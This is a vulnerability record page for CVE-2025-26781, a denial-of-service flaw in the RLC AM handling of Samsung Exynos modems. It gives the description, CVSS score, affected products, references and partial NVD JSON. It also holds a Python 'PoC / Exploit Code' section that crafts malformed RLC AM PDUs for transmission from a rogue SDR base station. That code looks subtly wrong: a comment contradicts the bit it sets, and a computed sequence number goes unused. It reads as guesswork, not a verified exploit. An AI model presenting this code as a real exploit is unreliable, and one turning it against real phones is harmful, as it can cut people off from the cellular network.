CVE-2025-26781

Description

An issue was discovered in L2 in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 9110, W920, W930, Modem 5123, and Modem 5300. Incorrect handling of RLC AM PDUs leads to a Denial of Service.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:samsung:exynos_w920_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_w920:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_1080_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_1080:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_980_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_980:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_990_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_990:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_850_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_850:-:*:*:*:*:*:*:* - NOT VULNERABLE

Samsung Exynos 980

Samsung Exynos 990

Samsung Exynos 850

Samsung Exynos 1080

Samsung Exynos 2100

Samsung Exynos 1280

Samsung Exynos 2200

Samsung Exynos 1330

Samsung Exynos 1380

Samsung Exynos 1480

Samsung Exynos 9110

Samsung Wearable Processor W920

Samsung Wearable Processor W930

Samsung Modem 5123

Samsung Modem 5300

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-26781 PoC - Samsung Exynos RLC AM PDU Denial of Service
# This PoC demonstrates the concept of triggering the vulnerability
# by sending malformed RLC AM PDUs to the target device.

import struct
import socket

class RLC_AM_PDU_Crafter:
    """Crafts malformed RLC AM PDUs to trigger CVE-2025-26781"""

    # RLC AM PDU types
    RLC_AM_DATA_PDU = 0x00
    RLC_AM_STATUS_PDU = 0x01

    def __init__(self):
        self.sequence_number = 0

    def craft_malformed_data_pdu(self):
        """
        Craft a malformed RLC AM Data PDU with invalid length field
        to trigger buffer overflow / resource exhaustion
        """
        # RLC AM Data PDU header
        # D/C bit = 0 (Data PDU), P bit, SI field, SN field
        # Set SI to 11 (reserved/invalid combination)
        pdu_header = 0x00
        pdu_header |= (1 << 0)   # D/C = 0 (Data PDU)
        pdu_header |= (1 << 1)   # P = 1 (Polling bit set)
        pdu_header |= (3 << 2)   # SI = 11 (invalid/reserved)
        pdu_header |= (self.sequence_number & 0x3FF) << 4  # SN (10-bit)

        # Malformed payload with excessive length indicator
        # LI field set to maximum value (127) repeatedly
        payload = b'\x7f' * 50  # Excessive length indicators

        return struct.pack('>H', pdu_header) + payload

    def craft_malformed_status_pdu(self):
        """
        Craft a malformed RLC AM Status PDU to trigger state machine confusion
        """
        # RLC AM Status PDU with invalid ACK_SN and NACK range
        status_pdu = b'\x01'  # D/C = 1 (Control PDU)
        status_pdu += struct.pack('>H', 0xFFFF)  # Invalid ACK_SN (overflow)
        # NACK with invalid range causing resource exhaustion
        status_pdu += b'\x00\x01'  # NACK_SN
        status_pdu += b'\x7f\xff'  # Invalid range (SOstart, SOend)

        return status_pdu

    def craft_overflow_sequence(self):
        """
        Craft a sequence of PDUs with rapidly incrementing sequence numbers
        to trigger sequence number overflow handling issues
        """
        pdus = []
        for i in range(1024):
            sn = (self.sequence_number + i) & 0x3FF
            pdu = self.craft_malformed_data_pdu()
            pdus.append(pdu)
        return pdus


def exploit():
    """
    Main exploit function
    Note: Actual exploitation requires a rogue base station (e.g., using SDR)
    This demonstrates the PDU crafting logic
    """
    crafter = RLC_AM_PDU_Crafter()

    # Generate malformed PDUs
    malformed_data_pdu = crafter.craft_malformed_data_pdu()
    malformed_status_pdu = crafter.craft_malformed_status_pdu()
    overflow_sequence = crafter.craft_overflow_sequence()

    print(f"[*] Crafted malformed RLC AM Data PDU: {malformed_data_pdu.hex()}")
    print(f"[*] Crafted malformed RLC AM Status PDU: {malformed_status_pdu.hex()}")
    print(f"[*] Crafted overflow sequence: {len(overflow_sequence)} PDUs")
    print("[*] These PDUs should be transmitted via a rogue base station")
    print("[*] using SDR equipment (e.g., USRP, srsLTE/Open5GS) to trigger DoS")


if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-26781
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-26781
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-26781/
[4] VulDB https://vuldb.com/cve/CVE-2025-26781
[5] https://semiconductor.samsung.com/support/quality-support/product-security-updates/
[6] https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-26781/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-26781", "sourceIdentifier": "[email protected]", "published": "2025-10-20T16:15:36.770", "lastModified": "2025-11-04T13:11:01.813", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in L2 in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 9110, W920, W930, Modem 5123, and Modem 5300. Incorrect handling of RLC AM PDUs leads to a Denial of Service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-119"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_w920_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "B6ADED27-EDAF-4FB3-8CB2-AE5F59B93641"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_w920:-:*:*:*:*:*:*:*", "matchCriteriaId": "4BF79654-E5C6-4DFF-B33A-A78571CD300C"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1080_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "43DE4D6F-D662-46F2-93BC-9AE950320BDE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1080:-:*:*:*:*:*:*:*", "matchCriteriaId": "EE06CD56-8BFD-4208-843A-179E3E6F5C10"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_980_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "5F18F62E-2012-442E-BE60-6E76325D1824"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_980:-:*:*:*:*:*:*:*", "matchCriteriaId": "0D8701B6-6989-44D1-873A-A1823BFD7CCC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_990_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "BCF6C91D-DECE-4630-85FE-C22EF2B9160A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_990:-:*:*:*:*:*:*:*", "matchCriteriaId": "87FE8214-E165-4874-BB5A-3C4298708039"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_850_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "1928760C-4FC4-45B0-84FF-C1105CD1DD2A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_850:-:*:*:*:*:*:*:*", "matchCriteriaId": "BB410A6D-642B-49AE-8B1C-EADA953A84DA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "63C0D9AC-BD23-48C9-83E7-301DEC06E583"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_2200:-:*:*:*:*:*:*:*", "matchCriteriaId": "A72ADEBB-ED72-4A5B-BB27-95EDE43F8116"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1330_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "C2635646-DD6A-4735-8E01-F45445584832"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1330:-:*:*:*:*:*:*:*", "matchCriteriaId": "AA0F8A58-71B7-4503-A03A-6FB4282D75BD"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1380_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "D381478B-C638-4663-BD71-144BE4B02E46"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1380:-:*:*:*:*:*:*:*", "matchCriteriaId": "61E72146-72FE-4B54-AB79-3C665E7F016C"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1480_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "64897B0D-EBF6-4BEB-BF54-ABCDBFAB45E0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1480:-:*:*:*:*:*:*:*", "matc ... (truncated)